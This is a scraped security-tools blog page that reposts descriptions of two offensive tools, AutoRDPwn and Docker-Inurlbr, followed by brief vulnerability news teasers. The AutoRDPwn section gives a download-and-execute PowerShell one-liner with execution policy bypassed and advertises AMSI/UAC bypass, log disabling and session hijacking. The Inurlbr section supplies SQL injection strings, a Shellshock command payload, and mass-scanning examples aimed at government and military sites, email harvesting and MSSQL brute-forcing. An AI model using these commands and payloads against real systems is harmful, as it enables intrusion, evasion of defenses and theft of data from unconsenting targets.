AutoRDPwn v4.5 – The Shadow Attack Framework

AutoRDPwn is a script created in Powershell and designed to automate the Shadow attack on Microsoft Windows computers. This vulnerability allows a remote attacker to view his victim’s desktop without his consent, and even control it on request. For its correct operation, it is necessary to comply with the requirements described in the user guide.RequirementsPowershell 5.0 or higherChangesVersion 4.5• New ninja style icon!• Automatic cleaning of Powershell history after execution• Now all dependencies are downloaded from the same repository• Many errors and bugs fixed• UAC & AMSI bypass in 64-bit systems• New module available: Remote Desktop Caching• New module available: Disable system logs (Invoke-Phant0m)• New module available: Sticky Keys Hacking• New available module: Remote Desktop History• New available attack: Session Hijacking (passwordless)WARNING! This attack is very intrusive and can only be used locally*The rest of the changes can be consulted in the CHANGELOG fileUseThis application can be used locally, remotely or to pivot between computers. Thanks to the additional modules, it is possible to dump hashes and passwords or even recover the history of RDP connections.One line execution:powershell -ep bypass “cd $env:temp ; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1"The detailed guide of use can be found at the following link:https://darkbyte.net/autordpwn-la-guia-definitivaScreenshotsCredits and Acknowledgments• Mark Russinovich for his tool PsExec -> https://docs.microsoft.com/en-us/sysinternals/downloads/psexec• HarmJ0y & Matt Graeber for his script Get-System -> https://github.com/HarmJ0y/Misc-PowerShell• Stas’M Corp. for its RDP tool Wrapper -> https://github.com/stascorp/rdpwrap• Kevin Robertson for his script Invoke-TheHash -> https://github.com/Kevin-Robertson/Invoke-TheHash• Benjamin Delpy for his tool Mimikatz -> https://github.com/gentilkiwi/mimikatz• Halil Dalabasmaz for his script Invoke-Phant0m -> https://github.com/hlldz/Invoke-Phant0mContactThis software does not offer any kind of guarantee. Its use is exclusive for educational environments and / or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it.For more information, you can contact through info@darkbyte.netDownload AutoRDPwn

Link: http://feedproxy.google.com/~r/PentestTools/~3/ZHHxiH4qJi0/autordpwn-v45-shadow-attack-framework.html

Docker-Inurlbr – Advanced Search In Search Engines, Enables Analysis Provided To Exploit GET / POST Capturing Emails & Urls

Advanced search in search engines, enables analysis provided to exploit GET / POST capturing emails & urls, with an internal custom validation junction for each target / url found.How to buildgit clone https://github.com/gmdutra/docker-inurlbr.gitcd docker-inurlbrdocker build -t gmdutra/inurlbr .Rundocker run –name inurlbr -it -d gmdutra/inurlbrHELP:-h–help Alternative long length help command.–ajuda Command to specify Help.–info Information script.–update Code update. -q Choose which search engine you want through [1…24] / [e1..6]]: [options]: 1 – GOOGLE / (CSE) GENERIC RANDOM / API 2 – BING 3 – YAHOO BR 4 – ASK 5 – HAO123 BR 6 – GOOGLE (API) 7 – LYCOS 8 – UOL BR 9 – YAHOO US 10 – SAPO 11 – DMOZ 12 – GIGABLAST 13 – NEVER 14 – BAIDU BR 15 – YANDEX 16 – ZOO 17 – HOTBOT 18 – ZHONGSOU 19 – HKSEARCH 20 – EZILION 21 – SOGOU 22 – DUCK DUCK GO 23 – BOOROW 24 – GOOGLE(CSE) GENERIC RANDOM —————————————- SPECIAL MOTORS —————————————- e1 – TOR FIND e2 – ELEPHANT e3 – TORSEARCH e4 – WIKILEAKS e5 – OTN e6 – EXPLOITS SHODAN —————————————- all – All search engines / not special motors Default: 1 Example: -q {op} Usage: -q 1 -q 5 Using more than one engine: -q 1,2,5,6,11,24 Using all engines: -q all –proxy Choose which proxy you want to use through the search engine: Example: –proxy {proxy:port} Usage: –proxy localhost:8118 –proxy socks5://googleinurl@localhost:9050 –proxy http://admin:12334@172.16.0.90:8080 –proxy-file Set font file to randomize your proxy to each search engine. Example: –proxy-file {proxys} Usage: –proxy-file proxys_list.txt –time-proxy Set the time how often the proxy will be exchanged. Example: –time-proxy {second} Usage: –time-proxy 10 –proxy-http-file Set file with urls http proxy, are used to bular capch search engines Example: –proxy-http-file {youfilehttp} Usage: –proxy-http-file http_proxys.txt –tor-random Enables the TOR function, each usage links an unique IP. -t Choose the validation type: op 1, 2, 3, 4, 5 [options]: 1 – The first type uses default errors considering the script: It establishes connection with the exploit through the get method. Demo: www.alvo.com.br/pasta/index.php?id={exploit} 2 – The second type tries to valid the error defined by: -a=’VALUE_INSIDE_THE _TARGET’ It also establishes connection with the exploit through the get method Demo: www.alvo.com.br/pasta/index.php?id={exploit} 3 – The third type combine both first and second types: Then, of course, it also establishes connection with the exploit through the get method Demo: www.target.com.br{exploit} Default: 1 Example: -t {op} Usage: -t 1 4 – The fourth type a validation based on source file and will be enabled scanner standard functions. The source file their values are concatenated with target url. – Set your target with command –target {http://target} – Set your file with command -o {file} Explicative: Source file values: /admin/index.php?id= /pag/index.php?id= /brazil.php?new= Demo: www.target.com.br/admin/index.php?id={exploit} www.target.com.br/pag/index.php?id={exploit} www.target.com.br/brazil.php?new={exploit} 5 – (FIND PAGE) The fifth type of validation based on the source file, Will be enabled only one validation code 200 on the target server, or if the url submit such code will be considered vulnerable. – Set your target with command –target {http://target} – Set your file with command -o {file} Explicative: Source file values: /admin/admin.php /admin.asp /admin.aspx Demo: www.target.com.br/admin/admin.php www.target.com.br/admin.asp www.target.com.br/admin.aspx Observation: If it shows the code 200 will be separated in the output file DEFAULT ERRORS: [*]JAVA INFINITYDB, [*]LOCAL FILE INCLUSION, [*]ZIMBRA MAIL, [*]ZEND FRAMEWORK, [*]ERROR MARIADB, [*]ERROR MYSQL, [*]ERROR JBOSSWEB, [*]ERROR MICROSOFT, [*]ERROR ODBC, [*]ERROR POSTGRESQL, [*]ERROR JAVA INFINITYDB, [*]ERROR PHP, [*]CMS WORDPRESS, [*]SHELL WEB, [*]ERROR JDBC, [*]ERROR ASP, [*]ERROR ORACLE, [*]ERROR DB2, [*]JDBC CFM, [*]ERROS LUA, [*]ERROR INDEFINITE –dork Defines which dork the search engine will use. Example: –dork {dork} Usage: –dork ‘site:.gov.br inurl:php? id’ – Using multiples dorks: Example: –dork {[DORK]dork1[DORK]dork2[DORK]dork3} Usage: –dork ‘[DORK]site:br[DORK]site:ar inurl:php[DORK]site:il inurl:asp’ –dork-file Set font file with your search dorks. Example: –dork-file {dork_file} Usage: –dork-file ‘dorks.txt’ –exploit-get Defines which exploit will be injected through the GET method to each URL found. Example: –exploit-get {exploit_get} Usage: –exploit-get “?’´%270×27;" –exploit-post Defines which exploit will be injected through the POST method to each URL found. Example: –exploit-post {exploit_post} Usage: –exploit-post ‘field1=valor1&field2=valor2&field3=?´0x273exploit;&botao=ok’ –exploit-command Defines which exploit/parameter will be executed in the options: –command-vul/ –command-all. The exploit-command will be identified by the paramaters: –command-vul/ –command-all as _EXPLOIT_ Ex –exploit-command ‘/admin/config.conf’ –command-all ‘curl -v _TARGET__EXPLOIT_’ _TARGET_ is the specified URL/TARGET obtained by the process _EXPLOIT_ is the exploit/parameter defined by the option –exploit-command. Example: –exploit-command {exploit-command} Usage: –exploit-command ‘/admin/config.conf’ -a Specify the string that will be used on the search script: Example: -a {string} Usage: -a ‘hello world</title>’ -d Specify the script usage op 1, 2, 3, 4, 5. Example: -d {op} Usage: -d 1 /URL of the search engine. -d 2 /Show all the url. -d 3 /Detailed request of every URL. -d 4 /Shows the HTML of every URL. -d 5 /Detailed request of all URLs. -d 6 /Detailed PING – PONG irc. -s Specify the output file where it will be saved the vulnerable URLs. Example: -s {file} Usage: -s your_file.txt -o Manually manage the vulnerable URLs you want to use from a file, without using a search engine. Example: -o {file_where_my_urls_are} Usage: -o tests.txt –persist Attempts when Google blocks your search. The script tries to another google host / default = 4 Example: –persist {number_attempts} Usage: –persist 7 –ifredirect Return validation method post REDIRECT_URL Example: –ifredirect {string_validation} Usage: –ifredirect ‘/admin/painel.php’ -m Enable the search for emails on the urls specified. -u Enables the search for URL lists on the url specified. –gc Enable validation of values ​​with google webcache. –pr Progressive scan, used to set operators (dorks), makes the search of a dork and valid results, then goes a dork at a time. –file-cookie Open cookie file. –save-as Save results in a certain place. –shellshock Explore shellshock vulnerability by setting a malicious user-agent. –popup Run –command all or vuln in a parallel terminal. –cms-check Enable simple check if the url / target is using CMS. –no-banner Remove the script presentation banner. –unique Filter results in unique domains. –beep Beep sound when a vulnerability is found. –alexa-rank Show alexa positioning in the results. –robots Show values file robots. –range Set range IP. Example: –range {range_start,rage_end} Usage: –range ‘172.16.0.5#172.16.0.255′ –range-rand Set amount of random ips. Example: –range-rand {rand} Usage: –range-rand ’50’ –irc Sending vulnerable to IRC / server channel. Example: –irc {server#channel} Usage: –irc ‘irc.rizon.net#inurlbrasil’ –http-header Set HTTP header. Example: –http-header {youemail} Usage: –http-header ‘HTTP/1.1 401 Unauthorized,WWW-Authenticate: Basic realm="Top Secret"’ –sedmail Sending vulnerable to email. Example: –sedmail {youemail} Usage: –sedmail youemail@inurl.com.br –delay Delay between research processes. Example: –delay {second} Usage: –delay 10 –time-out Timeout to exit the process. Example: –time-out {second} Usage: –time-out 10 –ifurl Filter URLs based on their argument. Example: –ifurl {ifurl} Usage: –ifurl index.php?id= –ifcode Valid results based on your return http code. Example: –ifcode {ifcode} Usage: –ifcode 200 –ifemail Filter E-mails based on their argument. Example: –ifemail {file_where_my_emails_are} Usage: –ifemail sp.gov.br –url-reference Define referring URL in the request to send him against the target. Example: –url-reference {url} Usage: –url-reference http://target.com/admin/user/valid.php –mp Limits the number of pages in the search engines. Example: –mp {limit} Usage: –mp 50 –user-agent Define the user agent used in its request against the target. Example: –user-agent {agent} Usage: –user-agent ‘Mozilla/5.0 (X11; U; Linux i686) Gecko/20071127 Firefox/2.0.0.11’ Usage-exploit / SHELLSHOCK: –user-agent ‘() { foo;};echo; /bin/bash -c "expr 299663299665 / 3; echo CMD:;id; echo END_CMD:;"’ Complete command: php inurlbr.php –dork ‘_YOU_DORK_’ -s shellshock.txt –user-agent ‘_YOU_AGENT_XPL_SHELLSHOCK’ -t 2 -a ‘99887766555’ –sall Saves all urls found by the scanner. Example: –sall {file} Usage: –sall your_file.txt –command-vul Every vulnerable URL found will execute this command parameters. Example: –command-vul {command} Usage: –command-vul ‘nmap sV -p 22,80,21 _TARGET_’ –command-vul ‘./exploit.sh _TARGET_ output.txt’ –command-vul ‘php miniexploit.php -t _TARGET_ -s output.txt’ –command-all Use this commmand to specify a single command to EVERY URL found. Example: –command-all {command} Usage: –command-all ‘nmap sV -p 22,80,21 _TARGET_’ –command-all ‘./exploit.sh _TARGET_ output.txt’ –command-all ‘php miniexploit.php -t _TARGET_ -s output.txt’ [!] Observation: _TARGET_ will be replaced by the URL/target found, although if the user doesn’t input the get, only the domain will be executed. _TARGETFULL_ will be replaced by the original URL / target found. _TARGETXPL_ will be replaced by the original URL / target found + EXPLOIT –exploit-get. _TARGETIP_ return of ip URL / target found. _URI_ Back URL set of folders / target found. _RANDOM_ Random strings. _PORT_ Capture port of the current test, within the –port-scan process. _EXPLOIT_ will be replaced by the specified command argument –exploit-command. The exploit-command will be identified by the parameters –command-vul/ –command-all as _EXPLOIT_ –replace Replace values ​​in the target URL. Example: –replace {value_old[INURL]value_new} Usage: –replace ‘index.php?id=[INURL]index.php?id=1666+and+(SELECT+user,Password+from+mysql.user+limit+0,1)=1’ –replace ‘main.php?id=[INURL]main.php?id=1+and+substring(@@version,1,1)=1’ –replace ‘index.aspx?id=[INURL]index.aspx?id=1%27´’ –remove Remove values ​​in the target URL. Example: –remove {string} Usage: –remove ‘/admin.php?id=0’ –regexp Using regular expression to validate his research, the value of the Expression will be sought within the target/URL. Example: –regexp {regular_expression} All Major Credit Cards: Usage: –regexp ‘(?:4[0-9]{12}(?:[0-9]{3})?|5[1-5][0-9]{14}|6011[0-9]{12}|3(?:0[0-5]|[68][0-9])[0-9]{11}|3[47][0-9]{13})’ IP Addresses: Usage: –regexp ‘((?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?))’ EMAIL: Usage: –regexp ‘([\w\d\.\-\_]+)@([\w\d\.\_\-]+)’ —regexp-filter Using regular expression to filter his research, the value of the Expression will be sought within the target/URL. Example: —regexp-filter {regular_expression} EMAIL: Usage: —regexp-filter ‘([\w\d\.\-\_]+)@([\w\d\.\_\-]+)’ [!] Small commands manager: –exploit-cad Command register for use within the scanner. Format {TYPE_EXPLOIT}::{EXPLOIT_COMMAND} Example Format: NMAP::nmap -sV _TARGET_ Example Format: EXPLOIT1::php xpl.php -t _TARGET_ -s output.txt Usage: –exploit-cad ‘NMAP::nmap -sV _TARGET_’ Observation: Each registered command is identified by an id of your array. Commands are logged in exploits.conf file. –exploit-all-id Execute commands, exploits based on id of use, (all) is run for each target found by the engine. Example: –exploit-all-id {id,id} Usage: –exploit-all-id 1,2,8,22 –exploit-vul-id Execute commands, exploits based on id of use, (vull) run command only if the target was considered vulnerable. Example: –exploit-vul-id {id,id} Usage: –exploit-vul-id 1,2,8,22 –exploit-list List all entries command in exploits.conf file. [!] Running subprocesses: –sub-file Subprocess performs an injection strings in URLs found by the engine, via GET or POST. Example: –sub-file {youfile} Usage: –sub-file exploits_get.txt –sub-get defines whether the strings coming from –sub-file will be injected via GET. Usage: –sub-get –sub-post defines whether the strings coming from –sub-file will be injected via POST. Usage: –sub-get –sub-cmd-vul Each vulnerable URL found within the sub-process will execute the parameters of this command. Example: –sub-cmd-vul {command} Usage: –sub-cmd-vul ‘nmap sV -p 22,80,21 _TARGET_’ –sub-cmd-vul ‘./exploit.sh _TARGET_ output.txt’ –sub-cmd-vul ‘php miniexploit.php -t _TARGET_ -s output.txt’ –sub-cmd-all Run command to each target found within the sub-process scope. Example: –sub-cmd-all {command} Usage: –sub-cmd-all ‘nmap sV -p 22,80,21 _TARGET_’ –sub-cmd-all ‘./exploit.sh _TARGET_ output.txt’ –sub-cmd-all ‘php miniexploit.php -t _TARGET_ -s output.txt’ –port-scan Defines ports that will be validated as open. Example: –port-scan {ports} Usage: –port-scan ‘22,21,23,3306’ –port-cmd Define command that runs when finding an open door. Example: –port-cmd {command} Usage: –port-cmd ‘./xpl _TARGETIP_:_PORT_’ –port-cmd ‘./xpl _TARGETIP_/file.php?sqli=1’ –port-write Send values for door. Example: –port-write {‘value0′,’value1′,’value3′} Usage: –port-write "’NICK nk_test’,’USER nk_test 8 * :_ola’,’JOIN #inurlbrasil’,’PRIVMSG #inurlbrasil : minha_msg’" [!] Modifying values used within script parameters: md5 Encrypt values in md5. Example: md5({value}) Usage: md5(102030) Usage: –exploit-get ‘user?id=md5(102030)’ base64 Encrypt values in base64. Example: base64({value}) Usage: base64(102030) Usage: –exploit-get ‘user?id=base64(102030)’ hex Encrypt values in hex. Example: hex({value}) Usage: hex(102030) Usage: –exploit-get ‘user?id=hex(102030)’ Generate random values. Example: random({character_counter}) Usage: random(8) Usage: –exploit-get ‘user?id=random(8)’Simple Commandsdocker exec inurlbr ./inurlbr.php –dork ‘inurl:php?id=’ -s save.txt -q 1,6 -t 1 –exploit-get "?´’%270×27;" docker exec inurlbr ./inurlbr.php –dork ‘inurl:aspx?id=’ -s save.txt -q 1,6 -t 1 –exploit-get "?´’%270×27;" docker exec inurlbr ./inurlbr.php –dork ‘site:br inurl:aspx (id|new)’ -s save.txt -q 1,6 -t 1 –exploit-get "?´’%270×27;" docker exec inurlbr ./inurlbr.php –dork ‘index of wp-content/uploads’ -s save.txt -q 1,6,2,4 -t 2 –exploit-get ‘?’ -a ‘Index of /wp-content/uploads’ docker exec inurlbr ./inurlbr.php –dork ‘site:.mil.br intext:(confidencial) ext:pdf’ -s save.txt -q 1,6 -t 2 –exploit-get ‘?’ -a ‘confidencial’ docker exec inurlbr ./inurlbr.php –dork ‘site:.mil.br intext:(secreto) ext:pdf’ -s save.txt -q 1,6 -t 2 –exploit-get ‘?’ -a ‘secreto’ docker exec inurlbr ./inurlbr.php –dork ‘site:br inurl:aspx (id|new)’ -s save.txt -q 1,6 -t 1 –exploit-get "?´’%270×27;" docker exec inurlbr ./inurlbr.php –dork ‘.new.php?new id’ -s save.txt -q 1,6,7,2,3 -t 1 –exploit-get ‘+UNION+ALL+SELECT+1,concat(0x3A3A4558504C4F49542D5355434553533A3A,@@version),3,4,5;’ -a ‘::EXPLOIT-SUCESS::’ docker exec inurlbr ./inurlbr.php –dork ‘new.php?id=’ -s teste.txt –exploit-get ?´0x27 –command-vul ‘nmap sV -p 22,80,21 _TARGET_’ docker exec inurlbr ./inurlbr.php –dork ‘site:pt inurl:aspx (id|q)’ -s bruteforce.txt –exploit-get ?´0x27 –command-vul ‘msfcli auxiliary/scanner/mssql/mssql_login RHOST=_TARGETIP_ MSSQL_USER=inurlbr MSSQL_PASS_FILE=/home/pedr0/Documentos/passwords E’ docker exec inurlbr ./inurlbr.php –dork ‘site:br inurl:id & inurl:php’ -s get.txt –exploit-get "?´’%270×27;" –command-vul ‘python ../sqlmap/sqlmap.py -u "_TARGETFULL_" –dbs’ docker exec inurlbr ./inurlbr.php –dork ‘inurl:index.php?id=’ -q 1,2,10 –exploit-get "’?´0x27’" -s report.txt –command-vul ‘nmap -Pn -p 1-8080 –script http-enum –open _TARGET_’ docker exec inurlbr ./inurlbr.php –dork ‘site:.gov.br email’ -s reg.txt -q 1 –regexp ‘([\w\d\.\-\_]+)@([\w\d\.\_\-]+)’ docker exec inurlbr ./inurlbr.php –dork ‘site:.gov.br email (gmail|yahoo|hotmail) ext:txt’ -s emails.txt -m docker exec inurlbr ./inurlbr.php –dork ‘site:.gov.br email (gmail|yahoo|hotmail) ext:txt’ -s urls.txt -u docker exec inurlbr ./inurlbr.php –dork ‘site:gov.bo’ -s govs.txt –exploit-all-id 1,2,6 docker exec inurlbr ./inurlbr.php –dork ‘site:.uk’ -s uk.txt –user-agent ‘Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)’ docker exec inurlbr ./inurlbr.php –dork-file ‘dorksSqli.txt’ -s govs.txt –exploit-all-id 1,2,6 docker exec inurlbr ./inurlbr.php –dork-file ‘dorksSqli.txt’ -s sqli.txt –exploit-all-id 1,2,6 –irc ‘irc.rizon.net#inurlbrasil’ docker exec inurlbr ./inurlbr.php –dork ‘inurl:"cgi-bin/login.cgi"’ -s cgi.txt –ifurl ‘cgi’ –command-all ‘php xplCGI.php _TARGET_’ docker exec inurlbr ./inurlbr.php –target ‘http://target.com.br’ -o cancat_file_urls_find.txt -s output.txt -t 4 docker exec inurlbr ./inurlbr.php –target ‘http://target.com.br’ -o cancat_file_urls_find.txt -s output.txt -t 4 –exploit-get "?´’%270×27;" docker exec inurlbr ./inurlbr.php –target ‘http://target.com.br’ -o cancat_file_urls_find.txt -s output.txt -t 4 –exploit-get "?pass=1234" -a ‘<title>hello! admin</title>’ docker exec inurlbr ./inurlbr.php –target ‘http://target.com.br’ -o cancat_file_urls_find_valid_cod-200.txt -s output.txt -t 5 docker exec inurlbr ./inurlbr.php –range ‘200.20.10.1,200.20.10.255’ -s output.txt –command-all ‘php roteador.php _TARGETIP_’ docker exec inurlbr ./inurlbr.php –range-rad ‘1500’ -s output.txt –command-all ‘php roteador.php _TARGETIP_’ docker exec inurlbr ./inurlbr.php –dork-rad ’20’ -s output.txt –exploit-get "?´’%270×27;" -q 1,2,6,4,5,9,7,8 docker exec inurlbr ./inurlbr.php –dork-rad ’20’ -s output.txt –exploit-get "?´’%270×27;" -q 1,2,6,4,5,9,7,8 –pr docker exec inurlbr ./inurlbr.php –dork-file ‘dorksCGI.txt’ -s output.txt -q 1,2,6,4,5,9,7,8 –pr –shellshock docker exec inurlbr ./inurlbr.php –dork-file ‘dorks_Wordpress_revslider.txt’ -s output.txt -q 1,2,6,4,5,9,7,8 –sub-file ‘xpls_Arbitrary_File_Download.txt’ Developers———————————————- Original Version———————————————- [+] AUTOR: googleINURL [+] EMAIL: inurlbr@gmail.com [+] Blog: http://blog.inurl.com.br———————————————- Docker Version———————————————- [+] AUTOR: Gabriel Dutra (c0olr00t) [+] EMAIL: gabrieldmdutra@gmail.com [+] LINKEDIN: linkedin.com/in/gmdutra/———————————————-Download Docker-Inurlbr</p> <p><img class="feed-img" src="https://1.bp.blogspot.com/-SPfzf68ZFlg/W-JbKgsWWoI/AAAAAAAANI8/wIQXPwgKALkfG7l5XfBNtLEc9tzPRY8_QCLcBGAs/s640/INURLBR.png" /></p> <p>Link: <a href="http://feedproxy.google.com/~r/PentestTools/~3/190rVgd4LLk/docker-inurlbr-advanced-search-in.html">http://feedproxy.google.com/~r/PentestTools/~3/190rVgd4LLk/docker-inurlbr-advanced-search-in.html</a></p> </div><!-- .entry-content --> </div> </article><!-- #post-## --> <article id="post-135502" class="post-135502 post type-post status-publish format-standard hentry category-uncategorized tag-bcmupnp_hunter tag-botnet tag-broadcom tag-malware tag-router tag-spam tag-universal-plug-and-play tag-upnp tag-vulnerabilities tag-vulnerability tag-web-security"> <div class="top-category"><i class="fa fa-tag"></i> <span class="cat-links"><a href="https://hackertor.com/category/uncategorized/" rel="category tag">HackerTor</a></span></div> <div class="post-inner"> <header class="entry-header"> <h1 class="entry-title"><a href="https://hackertor.com/2018/11/07/rapidly-growing-router-botnet-takes-advantage-of-5-year-old-flaw/" rel="bookmark">Rapidly Growing Router Botnet Takes Advantage of 5-Year-Old Flaw</a></h1> </header><!-- .entry-header --> <div class="entry-content"> <p>A sophisticated proxy code has infected hundreds of thousands of devices already.</p> <p><img class="feed-img" src="https://media.threatpost.com/wp-content/uploads/sites/103/2018/11/07110652/router-botnet.jpg" /></p> <p>Link: <a href="https://threatpost.com/rapidly-growing-router-botnet-takes-advantage-of-5-year-old-flaw/138869/">https://threatpost.com/rapidly-growing-router-botnet-takes-advantage-of-5-year-old-flaw/138869/</a></p> </div><!-- .entry-content --> </div> </article><!-- #post-## --> <article id="post-135484" class="post-135484 post type-post status-publish format-standard hentry category-uncategorized tag-denial-of-service tag-file-deletion-vulnerability tag-fix tag-patch tag-plugin tag-remote-code-execution tag-vulnerabilities tag-vulnerability tag-web-security tag-woocommerce tag-wordpress"> <div class="top-category"><i class="fa fa-tag"></i> <span class="cat-links"><a href="https://hackertor.com/category/uncategorized/" rel="category tag">HackerTor</a></span></div> <div class="post-inner"> <header class="entry-header"> <h1 class="entry-title"><a href="https://hackertor.com/2018/11/07/wordpress-flaw-opens-millions-of-woocommerce-shops-to-takeover/" rel="bookmark">WordPress Flaw Opens Millions of WooCommerce Shops to Takeover</a></h1> </header><!-- .entry-header --> <div class="entry-content"> <p>A file delete vulnerability in WordPress can be elevated into a remote code execution vulnerability for plugins like WooCommerce.</p> <p><img class="feed-img" src="https://media.threatpost.com/wp-content/uploads/sites/103/2018/08/17132809/wordpress1000-e1534526904561.png" /></p> <p>Link: <a href="https://threatpost.com/wordpress-flaw-opens-millions-of-woocommerce-shops-to-takeover/138861/">https://threatpost.com/wordpress-flaw-opens-millions-of-woocommerce-shops-to-takeover/138861/</a></p> </div><!-- .entry-content --> </div> </article><!-- #post-## --> <article id="post-135218" class="post-135218 post type-post status-publish format-standard hentry category-uncategorized tag-bitlocker tag-crucial tag-cryptography tag-data-encryption tag-physical-access tag-privacy tag-raboud-university tag-samsung tag-solid-state-drives tag-vulnerabilities tag-vulnerability"> <div class="top-category"><i class="fa fa-tag"></i> <span class="cat-links"><a href="https://hackertor.com/category/uncategorized/" rel="category tag">HackerTor</a></span></div> <div class="post-inner"> <header class="entry-header"> <h1 class="entry-title"><a href="https://hackertor.com/2018/11/06/samsung-crucials-flawed-storage-drive-encryption-leaves-data-exposed/" rel="bookmark">Samsung, Crucial’s Flawed Storage Drive Encryption Leaves Data Exposed</a></h1> </header><!-- .entry-header --> <div class="entry-content"> <p>Firmware updates won’t address the problem, so admins need to take other action.</p> <p><img class="feed-img" src="https://media.threatpost.com/wp-content/uploads/sites/103/2018/11/06115856/Malware-hardware-1024x1024.jpg" /></p> <p>Link: <a href="https://threatpost.com/samsung-crucials-flawed-storage-drive-encryption-leaves-data-exposed/138838/">https://threatpost.com/samsung-crucials-flawed-storage-drive-encryption-leaves-data-exposed/138838/</a></p> </div><!-- .entry-content --> </div> </article><!-- #post-## --> <div class="navigation posts-navigation"><ul> <li class="active"><a href="https://hackertor.com/tag/vulnerability/">1</a></li> <li><a href="https://hackertor.com/tag/vulnerability/page/2/">2</a></li> <li><a href="https://hackertor.com/tag/vulnerability/page/3/">3</a></li> <li>…</li> <li><a href="https://hackertor.com/tag/vulnerability/page/15/">15</a></li> <li><a href="https://hackertor.com/tag/vulnerability/page/2/" >></a></li> </ul></div> </main><!-- #main --> </div><!-- #primary --> <div id="secondary" class="widget-area" role="complementary"> <aside id="search-2" class="widget widget_search"><form role="search" method="get" class="search-form" action="https://hackertor.com/"> <label> <span class="screen-reader-text">Search for:</span> <input type="search" class="search-field" placeholder="Search …" value="" name="s" /> </label> <input type="submit" class="search-submit" value="Search" /> </form></aside> <aside id="recent-posts-2" class="widget widget_recent_entries"> <h4 class="widget-title">Recent Posts</h4> <ul> <li> <a href="https://hackertor.com/2018/11/20/vba2graph-generate-call-graphs-from-vba-code-for-easier-analysis-of-malicious-documents/">Vba2Graph – Generate Call Graphs From VBA Code, For Easier Analysis Of Malicious Documents</a> </li> <li> <a href="https://hackertor.com/2018/11/20/critical-adobe-flash-bug-impacts-windows-macos-linux-and-chrome-os/">Critical Adobe Flash Bug Impacts Windows, macOS, Linux and Chrome OS</a> </li> <li> <a href="https://hackertor.com/2018/11/20/na-vmsa-2018-0029-vsphere-data-protection-vdp-updates-address-multiple-security-issues/">NA – VMSA-2018-0029 – vSphere Data Protection (VDP) updates address multiple security issues.</a> </li> <li> <a href="https://hackertor.com/2018/11/20/na-cve-2018-17948-an-open-redirect-vulnerability-exists-in-the/">NA – CVE-2018-17948 – An open redirect vulnerability exists in the…</a> </li> <li> <a href="https://hackertor.com/2018/11/20/michael-pleasant-open-security-business-security-weekly-107/">Michael Pleasant, Open Security – Business Security Weekly #107</a> </li> </ul> </aside><aside id="archives-2" class="widget widget_archive"><h4 class="widget-title">Archives</h4> <ul> <li><a href='https://hackertor.com/2018/11/'>November 2018</a></li> <li><a href='https://hackertor.com/2018/10/'>October 2018</a></li> <li><a href='https://hackertor.com/2018/09/'>September 2018</a></li> <li><a href='https://hackertor.com/2018/08/'>August 2018</a></li> <li><a href='https://hackertor.com/2018/07/'>July 2018</a></li> <li><a href='https://hackertor.com/2018/06/'>June 2018</a></li> <li><a href='https://hackertor.com/2018/05/'>May 2018</a></li> <li><a href='https://hackertor.com/2018/04/'>April 2018</a></li> <li><a href='https://hackertor.com/2018/03/'>March 2018</a></li> <li><a href='https://hackertor.com/2018/02/'>February 2018</a></li> <li><a href='https://hackertor.com/2018/01/'>January 2018</a></li> <li><a href='https://hackertor.com/2017/12/'>December 2017</a></li> <li><a href='https://hackertor.com/2017/11/'>November 2017</a></li> <li><a href='https://hackertor.com/2017/10/'>October 2017</a></li> <li><a href='https://hackertor.com/2017/09/'>September 2017</a></li> <li><a href='https://hackertor.com/2017/08/'>August 2017</a></li> <li><a href='https://hackertor.com/2017/07/'>July 2017</a></li> <li><a href='https://hackertor.com/2017/06/'>June 2017</a></li> <li><a href='https://hackertor.com/2017/05/'>May 2017</a></li> <li><a href='https://hackertor.com/2017/04/'>April 2017</a></li> <li><a href='https://hackertor.com/2017/03/'>March 2017</a></li> <li><a href='https://hackertor.com/2017/02/'>February 2017</a></li> <li><a href='https://hackertor.com/2017/01/'>January 2017</a></li> <li><a href='https://hackertor.com/2016/12/'>December 2016</a></li> </ul> </aside><aside id="tag_cloud-2" class="widget widget_tag_cloud"><h4 class="widget-title">Tags</h4><div class="tagcloud"><a href="https://hackertor.com/tag/android/" class="tag-cloud-link tag-link-719 tag-link-position-1" style="font-size: 11.756097560976pt;" aria-label="Android (239 items)">Android</a> <a href="https://hackertor.com/tag/cloud-security/" class="tag-cloud-link tag-link-524 tag-link-position-2" style="font-size: 8.6829268292683pt;" aria-label="Cloud Security (158 items)">Cloud Security</a> <a href="https://hackertor.com/tag/code-scripting/" class="tag-cloud-link tag-link-38 tag-link-position-3" style="font-size: 11.585365853659pt;" aria-label="Code Scripting (232 items)">Code Scripting</a> <a href="https://hackertor.com/tag/cryptography/" class="tag-cloud-link tag-link-231 tag-link-position-4" style="font-size: 10.560975609756pt;" aria-label="Cryptography (202 items)">Cryptography</a> <a href="https://hackertor.com/tag/ctf-challenges/" class="tag-cloud-link tag-link-410 tag-link-position-5" style="font-size: 8pt;" aria-label="CTF Challenges (143 items)">CTF Challenges</a> <a href="https://hackertor.com/tag/data-security/" class="tag-cloud-link tag-link-2038 tag-link-position-6" style="font-size: 8.1707317073171pt;" aria-label="Data security (146 items)">Data security</a> <a href="https://hackertor.com/tag/enterprise-security-weekly/" class="tag-cloud-link tag-link-463 tag-link-position-7" style="font-size: 10.390243902439pt;" aria-label="Enterprise Security Weekly (200 items)">Enterprise Security Weekly</a> <a href="https://hackertor.com/tag/framework/" class="tag-cloud-link tag-link-159 tag-link-position-8" style="font-size: 11.414634146341pt;" aria-label="Framework (226 items)">Framework</a> <a href="https://hackertor.com/tag/google/" class="tag-cloud-link tag-link-305 tag-link-position-9" style="font-size: 10.731707317073pt;" aria-label="google (206 items)">google</a> <a href="https://hackertor.com/tag/government/" class="tag-cloud-link tag-link-73 tag-link-position-10" style="font-size: 11.756097560976pt;" aria-label="Government (238 items)">Government</a> <a href="https://hackertor.com/tag/hacking/" class="tag-cloud-link tag-link-134 tag-link-position-11" style="font-size: 11.585365853659pt;" aria-label="hacking (236 items)">hacking</a> <a href="https://hackertor.com/tag/hacks/" class="tag-cloud-link tag-link-74 tag-link-position-12" style="font-size: 16.878048780488pt;" aria-label="Hacks (478 items)">Hacks</a> <a href="https://hackertor.com/tag/interview/" class="tag-cloud-link tag-link-135 tag-link-position-13" style="font-size: 